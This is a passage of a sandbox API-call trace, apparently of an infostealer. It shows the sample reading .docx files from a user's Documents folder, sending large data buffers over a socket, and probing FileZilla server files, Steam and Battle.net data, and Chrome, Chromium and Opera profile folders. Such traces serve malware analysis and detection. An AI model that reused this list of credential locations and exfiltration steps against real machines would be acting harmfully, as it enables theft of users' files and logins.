"c:\\users\\keecfmwgj\\documents\\t6gw4d_mtgvoesu.docx"), fInfoLevelId=0x0, lpFileInformation=0x38f060 | out: lpFileInformation=0x38f060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x770dc980, ftCreationTime.dwHighDateTime=0x1d7689f, ftLastAccessTime.dwLowDateTime=0x3786f610, ftLastAccessTime.dwHighDateTime=0x1d779a7, ftLastWriteTime.dwLowDateTime=0x3786f610, ftLastWriteTime.dwHighDateTime=0x1d779a7, nFileSizeHigh=0x0, nFileSizeLow=0x12cd8)) returned 1 [0232.555] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed98) returned 1 [0232.555] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx", nBufferLength=0x105, lpBuffer=0x38eaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx", lpFilePart=0x0) returned 0x31 [0232.555] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb8) returned 1 [0232.556] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\t6GW4d_MTgVoESu.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\t6gw4d_mtgvoesu.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x614 [0232.556] GetFileType (hFile=0x614) returned 0x1 [0232.556] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38efb4) returned 1 [0232.556] GetFileType (hFile=0x614) returned 0x1 [0232.556] ReadFile (in: hFile=0x614, lpBuffer=0x279bbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x279bbb0*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.557] ReadFile (in: hFile=0x614, lpBuffer=0x279bbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x279bbb0*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.558] ReadFile (in: hFile=0x614, lpBuffer=0x279bbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x279bbb0*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.558] ReadFile (in: hFile=0x614, lpBuffer=0x279bbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x279bbb0*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.559] ReadFile (in: hFile=0x614, lpBuffer=0x279bbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x279bbb0*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.559] ReadFile (in: hFile=0x614, lpBuffer=0x279bbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x279bbb0*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.560] ReadFile (in: hFile=0x614, lpBuffer=0x279bbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x279bbb0*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.560] ReadFile (in: hFile=0x614, lpBuffer=0x279bbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x279bbb0*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.561] ReadFile (in: hFile=0x614, lpBuffer=0x279bbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x279bbb0*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.561] ReadFile (in: hFile=0x614, lpBuffer=0x279bbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x279bbb0*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.562] ReadFile (in: hFile=0x614, lpBuffer=0x279bbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x279bbb0*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.562] ReadFile (in: hFile=0x614, lpBuffer=0x279bbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x279bbb0*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.563] ReadFile (in: hFile=0x614, lpBuffer=0x279bbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x279bbb0*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.563] ReadFile (in: hFile=0x614, lpBuffer=0x279bbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x279bbb0*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.563] ReadFile (in: hFile=0x614, lpBuffer=0x279bbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x279bbb0*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.564] ReadFile (in: hFile=0x614, lpBuffer=0x279bbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x279bbb0*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.564] ReadFile (in: hFile=0x614, lpBuffer=0x279bbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x279bbb0*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.564] ReadFile (in: hFile=0x614, lpBuffer=0x279bbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x279bbb0*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.565] ReadFile (in: hFile=0x614, lpBuffer=0x279bbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x279bbb0*, lpNumberOfBytesRead=0x38f024*=0xcd8, lpOverlapped=0x0) returned 1 [0232.565] ReadFile (in: hFile=0x614, lpBuffer=0x279b028, nNumberOfBytesToRead=0x328, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x279b028*, lpNumberOfBytesRead=0x38f024*=0x0, lpOverlapped=0x0) returned 1 [0232.565] ReadFile (in: hFile=0x614, lpBuffer=0x279bbb0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x279bbb0*, lpNumberOfBytesRead=0x38f024*=0x0, lpOverlapped=0x0) returned 1 [0232.569] CloseHandle (hObject=0x614) returned 1 [0232.569] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx", nBufferLength=0x105, lpBuffer=0x38eb9c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx", lpFilePart=0x0) returned 0x31 [0232.569] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ee28) returned 1 [0232.569] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\w0tv7enecko 9vk.docx"), fInfoLevelId=0x0, lpFileInformation=0x27d6da8 | out: lpFileInformation=0x27d6da8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94fade60, ftCreationTime.dwHighDateTime=0x1d7a2dd, ftLastAccessTime.dwLowDateTime=0xd6fc5590, ftLastAccessTime.dwHighDateTime=0x1d7c4a8, ftLastWriteTime.dwLowDateTime=0xd6fc5590, ftLastWriteTime.dwHighDateTime=0x1d7c4a8, nFileSizeHigh=0x0, nFileSizeLow=0x660b)) returned 1 [0232.569] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee24) returned 1 [0232.569] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents", nBufferLength=0x105, lpBuffer=0x38eb90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents", lpFilePart=0x0) returned 0x1c [0232.569] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx", nBufferLength=0x105, lpBuffer=0x38eb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx", lpFilePart=0x0) returned 0x31 [0232.570] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx", nBufferLength=0x105, lpBuffer=0x38eb5c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx", lpFilePart=0x0) returned 0x31 [0232.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ed9c) returned 1 [0232.570] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\w0tv7enecko 9vk.docx"), fInfoLevelId=0x0, lpFileInformation=0x38f060 | out: lpFileInformation=0x38f060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x94fade60, ftCreationTime.dwHighDateTime=0x1d7a2dd, ftLastAccessTime.dwLowDateTime=0xd6fc5590, ftLastAccessTime.dwHighDateTime=0x1d7c4a8, ftLastWriteTime.dwLowDateTime=0xd6fc5590, ftLastWriteTime.dwHighDateTime=0x1d7c4a8, nFileSizeHigh=0x0, nFileSizeLow=0x660b)) returned 1 [0232.570] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed98) returned 1 [0232.570] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx", nBufferLength=0x105, lpBuffer=0x38eaa0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx", lpFilePart=0x0) returned 0x31 [0232.570] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38efb8) returned 1 [0232.570] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\W0TV7ENECKo 9vK.docx" (normalized: "c:\\users\\keecfmwgj\\documents\\w0tv7enecko 9vk.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x614 [0232.570] GetFileType (hFile=0x614) returned 0x1 [0232.571] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38efb4) returned 1 [0232.571] GetFileType (hFile=0x614) returned 0x1 [0232.571] ReadFile (in: hFile=0x614, lpBuffer=0x27d80a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27d80a8*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.572] ReadFile (in: hFile=0x614, lpBuffer=0x27d80a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27d80a8*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.572] ReadFile (in: hFile=0x614, lpBuffer=0x27d80a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27d80a8*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.573] ReadFile (in: hFile=0x614, lpBuffer=0x27d80a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27d80a8*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.573] ReadFile (in: hFile=0x614, lpBuffer=0x27d80a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27d80a8*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.573] ReadFile (in: hFile=0x614, lpBuffer=0x27d80a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27d80a8*, lpNumberOfBytesRead=0x38f024*=0x1000, lpOverlapped=0x0) returned 1 [0232.574] ReadFile (in: hFile=0x614, lpBuffer=0x27d80a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27d80a8*, lpNumberOfBytesRead=0x38f024*=0x60b, lpOverlapped=0x0) returned 1 [0232.574] ReadFile (in: hFile=0x614, lpBuffer=0x27d7653, nNumberOfBytesToRead=0x1f5, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27d7653*, lpNumberOfBytesRead=0x38f024*=0x0, lpOverlapped=0x0) returned 1 [0232.574] ReadFile (in: hFile=0x614, lpBuffer=0x27d80a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x38f024, lpOverlapped=0x0 | out: lpBuffer=0x27d80a8*, lpNumberOfBytesRead=0x38f024*=0x0, lpOverlapped=0x0) returned 1 [0232.575] CloseHandle (hObject=0x614) returned 1 [0232.578] CoCreateGuid (in: pguid=0x38edcc | out: pguid=0x38edcc*(Data1=0x85f13af4, Data2=0xccf6, Data3=0x4838, Data4=([0]=0xb3, [1]=0x45, [2]=0x93, [3]=0xfa, [4]=0x63, [5]=0xc6, [6]=0xa1, [7]=0xb8))) returned 0x0 [0232.579] CoCreateGuid (in: pguid=0x38ed10 | out: pguid=0x38ed10*(Data1=0xf61c84a6, Data2=0x95c7, Data3=0x4c79, Data4=([0]=0x9a, [1]=0x76, [2]=0x71, [3]=0x47, [4]=0xbb, [5]=0x96, [6]=0xb1, [7]=0xc0))) returned 0x0 [0232.640] send (s=0x268, buf=0x3bf9f9e*, len=65536, flags=0) returned 65536 [0232.641] send (s=0x268, buf=0x3c09f9e*, len=65536, flags=0) returned 65536 [0232.731] send (s=0x268, buf=0x3c19f9e*, len=65536, flags=0) returned 65536 [0232.775] send (s=0x268, buf=0x3c29f9e*, len=65536, flags=0) returned 65536 [0232.832] send (s=0x268, buf=0x3c39f9e*, len=65536, flags=0) returned 65536 [0232.893] send (s=0x268, buf=0x3c49f9e*, len=47708, flags=0) returned 47708 [0233.456] recv (in: s=0x268, buf=0x25746cc, len=8192, flags=0 | out: buf=0x25746cc*) returned 128 [0233.481] CoTaskMemAlloc (cb=0x20c) returned 0x5628ee0 [0233.481] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5628ee0 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0233.481] CoTaskMemFree (pv=0x5628ee0) [0233.481] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x38eb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x0) returned 0x22 [0233.481] CoTaskMemAlloc (cb=0x20c) returned 0x5628ee0 [0233.481] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5628ee0 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Roaming") returned 0x0 [0233.481] CoTaskMemFree (pv=0x5628ee0) [0233.481] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x38eb48, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming", lpFilePart=0x0) returned 0x22 [0233.481] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\FileZilla\\recentservers.xml", nBufferLength=0x105, lpBuffer=0x38ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\FileZilla\\recentservers.xml", lpFilePart=0x0) returned 0x3e [0233.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ee20) returned 1 [0233.482] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\FileZilla\\recentservers.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\filezilla\\recentservers.xml"), fInfoLevelId=0x0, lpFileInformation=0x38f0e4 | out: lpFileInformation=0x38f0e4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0233.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee1c) returned 1 [0233.482] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\FileZilla\\sitemanager.xml", nBufferLength=0x105, lpBuffer=0x38ebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\FileZilla\\sitemanager.xml", lpFilePart=0x0) returned 0x3c [0233.482] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ee20) returned 1 [0233.482] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\FileZilla\\sitemanager.xml" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\filezilla\\sitemanager.xml"), fInfoLevelId=0x0, lpFileInformation=0x38f0e4 | out: lpFileInformation=0x38f0e4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0233.482] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ee1c) returned 1 [0233.485] CoCreateGuid (in: pguid=0x38edcc | out: pguid=0x38edcc*(Data1=0xe846e645, Data2=0xc1b4, Data3=0x4e25, Data4=([0]=0x80, [1]=0x3d, [2]=0x7a, [3]=0x4e, [4]=0x5f, [5]=0xde, [6]=0xfd, [7]=0xef))) returned 0x0 [0233.485] CoCreateGuid (in: pguid=0x38ed10 | out: pguid=0x38ed10*(Data1=0x94a72b87, Data2=0xbb0f, Data3=0x4013, Data4=([0]=0x8b, [1]=0x28, [2]=0xad, [3]=0xc2, [4]=0xb3, [5]=0x15, [6]=0xa6, [7]=0x27))) returned 0x0 [0233.486] send (s=0x268, buf=0x3bf9f9f*, len=167, flags=0) returned 167 [0233.486] recv (in: s=0x268, buf=0x25746cc, len=8192, flags=0 | out: buf=0x25746cc*) returned 129 [0233.534] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Valve\\Steam", ulOptions=0x0, samDesired=0x20019, phkResult=0x38f078 | out: phkResult=0x38f078*=0x0) returned 0x2 [0233.537] CoCreateGuid (in: pguid=0x38edc8 | out: pguid=0x38edc8*(Data1=0xa8282f4a, Data2=0x1a6c, Data3=0x49d2, Data4=([0]=0xbc, [1]=0xc9, [2]=0x4e, [3]=0xe1, [4]=0xa6, [5]=0xf0, [6]=0xc7, [7]=0x66))) returned 0x0 [0233.537] CoCreateGuid (in: pguid=0x38ed0c | out: pguid=0x38ed0c*(Data1=0xea314488, Data2=0xf0f1, Data3=0x4a87, Data4=([0]=0xb8, [1]=0x1a, [2]=0xd6, [3]=0x88, [4]=0xb5, [5]=0xf1, [6]=0xa0, [7]=0x36))) returned 0x0 [0233.537] send (s=0x268, buf=0x3bf9f9f*, len=162, flags=0) returned 162 [0233.538] recv (in: s=0x268, buf=0x25746cc, len=8192, flags=0 | out: buf=0x25746cc*) returned 132 [0234.041] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.041] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Battle.net", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net") returned 0x2c [0234.041] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.041] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net", lpFilePart=0x0) returned 0x2b [0234.041] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Battle.net\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.042] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.091] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.091] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Chromium\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data") returned 0x34 [0234.092] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.092] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data", lpFilePart=0x0) returned 0x33 [0234.092] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Chromium\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.092] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.094] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.094] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Google\\Chrome\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data") returned 0x39 [0234.094] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.094] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data", lpFilePart=0x0) returned 0x38 [0234.094] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google\\Chrome\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.094] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.096] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.096] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Local\\Google(x86)\\Chrome\\User Data", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data") returned 0x3e [0234.096] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.096] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data", lpFilePart=0x0) returned 0x3d [0234.096] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Google(x86)\\Chrome\\User Data\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.096] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.097] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.098] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Opera Software\\", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\") returned 0x33 [0234.098] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x38ef9c) returned 1 [0234.098] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\", nBufferLength=0x105, lpBuffer=0x38ea7c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\", lpFilePart=0x0) returned 0x32 [0234.098] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Opera Software\\*", lpFindFileData=0x38ed4c | out: lpFindFileData=0x38ed4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0234.098] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x38ed0c) returned 1 [0234.099] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x38ef04, nSize=0x64 | out: lpDst="C:\\Users\\kEecfMwgj") returned 0x13 [0234.100] ExpandEnvironmentStringsW (in: 